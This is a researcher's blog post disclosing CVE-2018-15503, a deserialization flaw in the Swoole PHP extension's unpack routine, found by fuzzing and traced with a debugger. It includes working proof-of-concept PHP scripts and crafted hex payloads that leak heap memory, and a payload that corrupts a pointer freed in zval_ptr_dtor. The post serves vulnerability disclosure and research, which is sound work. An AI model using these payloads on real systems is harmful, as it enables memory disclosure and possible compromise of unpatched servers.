Doomsday Vault

Logo

X-C3LL's Personal Blog :)

14 August 2018

Vulnerability in Swoole PHP extension [CVE-2018-15503]

         Last weekend I was playing around (de)serialization and PHP when I discovered a vulnerability inside Swoole (version 4.0.4) deserialization routines. Let’s talk a bit about the vulnerability!

0x00 Introduction

         I started searching for serialization / deserialization functions implemented in PHP.net when I found this little one: Swoole\Serialize->unpack(). The first step was to search for known reported vulnerabilities in that function because in general, serialization / deserialization is hard to implement correctly and this kind of functions historically are prone to contains interesting vulnerabilities (just keep an eye on the PHP core and all the vulnerabilities related with unserialize()). Total vulnerabilities publicly disclosed: 0. Weird as hell.

         As any vulnerability related with this function was reported, maybe we have an oportunity :)

0x01 Getting crashes

         In order to generate a corpus to start the fuzzing process I used as seed the ones provided by the funserialize repo from Sean Heelan. The serialized seeds are known to trigger bugs in PHP unserialize() function, so this kind of inputs are perfect to discover problematic paths inside serialization / deserialization routines. We only need to translate the serialization format to one that Swoole understand. This stupid snippet does the job:

<?php
	$data = $argv[1];

	$test = unserialize($data);
	echo "[+] UNSERIALIZED:\n";
	var_dump($test);
	$obj = new \Swoole\Serialize();
	echo "[+] Swoole Serialized: \n";
	$sor = $obj->pack($test);
	echo bin2hex($sor) . "\n";
?>

         So with one of the test-cases provided by the funserialize repo we obtain an hex output that is the representation of the serialized object:

⇒  php tester.php 'a:3:{i:123;s:4:"meow";i:123;R:1;i:1;O:8:"stdClass":1:{s:4:"prop";i:4919;}}'
[+] UNSERIALIZED:
array(2) {
  [123]=>
  array(2) {
    [123]=>
    *RECURSION*
    [1]=>
    object(stdClass)#1 (1) {
      ["prop"]=>
      int(4919)
    }
  }
  [1]=>
  object(stdClass)#1 (1) {
    ["prop"]=>
    int(4919)
  }
}
[+] Swoole Serialized:
e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc1003713454f46

         We can save this hexadecimal representation in files and then feed our mutator in order to generate malformed inputs. In this case, we only used a bitfliping approach and hundreds of crashes appeared in few minutes. To test the inputs, just use this snippet that calls the target function:

<?php
    $test = file_get_contents($argv[1]);
    $obj = new \Swoole\Serialize();
    $ser = $obj->unpack($test);
?>

0x02 Triaging a crash

         One of the crashes that looked interesting was one that… well… it was not a sigsegv. It is:

Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 725984920982417440 bytes) in /research/swoole-ext/hextester.php on line 5

         Hum… Ok. Lets check the differences between the original input (not mutated) and the one that produces this crazy allocation:

e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc1003713454f46 e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc3003713454f46

         Changing a 1 for a 3 and it tries to allocate almost 726 Petabytes. That is insane. It is a weird number, right? but if we turn it from decimal to hexadecimal….

>>> hex(725984920982417440)
'0xa1337706f727020'

         Ok, that string with a 1337 looks familiar… lets change it a bit…

>>> a = str(hex(725984920982417440))[3:].decode("hex")[::-1].encode("hex")
>>> print a
2070726f703713

         So in the deserialization process the extension is performing an allocation based on a value inside the string that we provide:

e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc1003713454f46 e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc3003713454f46

         As it tried to allocate hundreds of petabytes, we can guess that the size asked to allocate is not checked properly. And a size not checked correctly means tons of fun. Reading diagonally the code we can spot the lines where the allocation is made:

void *str_pool_addr = get_pack_string_len_addr(&buffer, &key_len);
p->key = zend_string_init((char*) str_pool_addr, key_len, 0);

         The zend_string_init function creates a zend_string structure and copy from the pointer (first argument) the size (second argument) desired. The size to copy is setted via get_pack_string_len_addr() function:

get_pack_string_len_addr(void ** buffer, size_t *strlen)
{
	...
	*strlen = *((unsigned short*) str_pool_addr);
	...

         Put a breakpoint in the allocation and run again the crash:

pwndbg> print key_len
$116 = 725984920982417412

         So our theory was right, the key_len extracted via get_pack_string_len_addr() is used in the allocation. In the not-mutated serialized data the value is:

Breakpoint swoole_serialize.c:709
pwndbg> print key_len
$117 = 4

Mmm… and if we change the original c1 for a a0?

Breakpoint swoole_serialize.c:709
pwndbg> print key_len
$119 = 8030604250369323891


>>> a = str(hex(8030604250369323891))[2:].decode("hex")[::-1].encode("hex")
>>> print a
7373018b0470726f

e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc3003713454f46 e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fa0003713454f46

         The value taken was shifted. Nice!

0x03 Getting dirty

         At this point we triaged the issue that makes our code to crash. Now its time to start playing a bit with this little boy. If we calculate the right position, the key_len value used for the allocation will be controlled by us (as we can serialize any integer), so we can leak an arbitrary size of memory. Let’s try to leak 255 bytes (ff):

e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037ff0a010800737464436c617373018fc10037130a010800737464436c617373018ff1003713454f46


<?php
	$data = "e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037ff0a010800737464436c617373018fc10037130a010800737464436c617373018ff1003713454f46";
	$obj = new \Swoole\Serialize();
	$sor = hex2bin($data);
	$ser = $obj->unpack($sor);
	echo "[+] Swoole Unserialized:\n";
	var_dump($ser);
	echo "[+] Memory Leaked:\n";
	$keys = key(get_object_vars($ser[1]));
	echo bin2hex($keys);
	echo "\n[+] Size: \n";
	echo strlen($keys);
?>

         Nailed!

⇒  php memory_leak.php
[+] Swoole Unserialized:
array(2) {
  [123]=>
  array(2) {
    [123]=>
    array(2) {
      [123]=>
      NULL
      [1]=>
      object(stdClass)#2 (1) {
        ["prop"]=>
        int(-201)
      }
    }
    [1]=>
    object(stdClass)#3 (1) {
      ["prop"]=>
      int(4919)
    }
  }
  [1]=>
  object(stdClass)#4 (1) {
    ["
stdClass7
stdClass7EOFH@@`p@ @P@"]=>
    int(4919)
  }
}
[+] Memory Leaked:
0a010800737464436c617373018fc10037130a010800737464436c617373018ff1003713454f460000c0f0c702bd
7f000048f0c702bd7f0000400000000000000040b2c702bd7f00000614000002000000050200000200000060f0c7
02bd7f000070f0c702bd7f00004000000000000000c093c602bd7f00000614000003000000000100000300000020
f1c702bd7f0000400000000000000050b1c602bd7f000006140000030000004000000000000000c815c002bd7f00
00061400000300000080000000030000000000000000000000000000000000000000000000000000000000000000
00000080f1c702bd7f00000e02000003000000c8f0c702bd7f
[+] Size:
255%

         Playing a bit you can perform bigger leaks, like this one (24946 bytes):


<?php
	$data = "e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018ff6003713454f46";
	$obj = new \Swoole\Serialize();
	$sor = hex2bin($data);
	$ser = $obj->unpack($sor);
	echo "[+] Swoole Unserialized:\n";
	var_dump($ser);
	echo "[+] Memory Leaked:\n";
	$keys = key(get_object_vars($ser[1]));
	echo bin2hex($keys);
	echo "\n[+] Size: \n";
	echo strlen($keys);
?>

0x04 Getting even dirtier

         Let’s try to change our seed (‘a:3:{i:123;s:4:"meow";i:123;R:1;i:1;O:8:"stdClass":1:{s:4:"prop";i:4919;}}’) for one with a bigger integer (0x41414141 == 1094795585) and compare them:

[4919 (0x1337)]
e8 02 ea7b 02ea 7b 02 22 7b0a
01 08 00 737464436c617373
01 8b 04 70726f70 37130a
01 08 00 737464436c617373
01 8f c1 0037130a
01 08 00 737464436c617373
01 8f c1 003713
454f46

[1094795585 (0x41414141)]
e8 02 ea7b 02ea 7b 02 22 7b0a
01 08 00 737464436c617373
01 93 04 70726f70 414141410a
01 08 00 737464436c617373
01 97 c1 00414141410a
01 08 00 737464436c617373
01 97 c1 0041414141
454f46

         So the difference is from 8f (with 2 bytes, 3713) to 97 (with 4 bytes, 41414141) -please spot that the difference between 8f and 97 is 8-. What happens if we change that 97 for a 8f in the last entry?

e802ea7b02ea7b02227b0a010800737464436c61737301930470726f70414141410a010800737464436c6173730197c100414141410a010800737464436c617373018fc10041414141454f46

[+] Swoole Unserialized:
array(2) {
  [123]=>
  array(2) {
    [123]=>
    array(2) {
      [123]=>
      NULL
      [1]=>
      object(stdClass)#2 (1) {
        ["prop"]=>
        int(1094795585)
      }
    }
    [1]=>
    object(stdClass)#3 (1) {
      ["prop"]=>
      int(1094795585)
    }
  }
  [1]=>
  object(stdClass)#4 (1) {
    ["prop"]=>
    int(16705)
  }
}

         The 16705 vs the 1094795585 expected means that only 2 bytes were taken (16705 == 0x4141). What happens if we put it to zero?

e802ea7b02ea7b02227b0a010800737464436c61737301930470726f70414141410a010800737464436c6173730197c100414141410a010800737464436c6173730100c10041414141454f46

...
 44 static zend_always_inline void i_zval_ptr_dtor(zval *zval_ptr ZEND_FILE_LINE_DC)
   45 {
   46   if (Z_REFCOUNTED_P(zval_ptr)) {
   47           zend_refcounted *ref = Z_COUNTED_P(zval_ptr);
 ► 48           if (!--GC_REFCOUNT(ref)) {
   49                   _zval_dtor_func(ref ZEND_FILE_LINE_RELAY_CC);
   ....
Program received signal SIGSEGV (fault address 0x41414141)

pwndbg> i r
rax            0x41414141       1094795585
rbx            0x0      0
rcx            0x14     20
rdx            0x1      1
rsi            0x7ffff3864b60   140737279052640
rdi            0x7ffff38023f0   140737278649328
rbp            0x7fffffff7480   0x7fffffff7480
rsp            0x7fffffff73d0   0x7fffffff73d0
r8             0xffff   65535
r9             0x7fffffff79fc   140737488321020
r10            0x941    2369
r11            0x555555bbc584   93824998950276
r12            0x555555684d10   93824993479952
r13            0x7fffffffe460   140737488348256
r14            0x7ffff381c030   140737278754864
r15            0x7ffff3870160   140737279099232
rip            0x555555bc0850   0x555555bc0850 <zend_array_destroy+487>
eflags         0x10202  [ IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0

         Oh snaps! Is that a mighty zval_ptr_dtor? Is that our brave 0x41414141? And can we copy structures freely as we seen before? Can we leak memory too? This looks like an adventure for you, my dearest reader :).

0x05 Final words

         The vulnerability is already patched in the GitHub master branch (it is a live project with updates almost daily). I am not sure if this kind of articles are useful, but at least it works as a “log” to myself. If you find it interesting, or spot any error or typo, feel free to contact me at twitter (@TheXC3LL).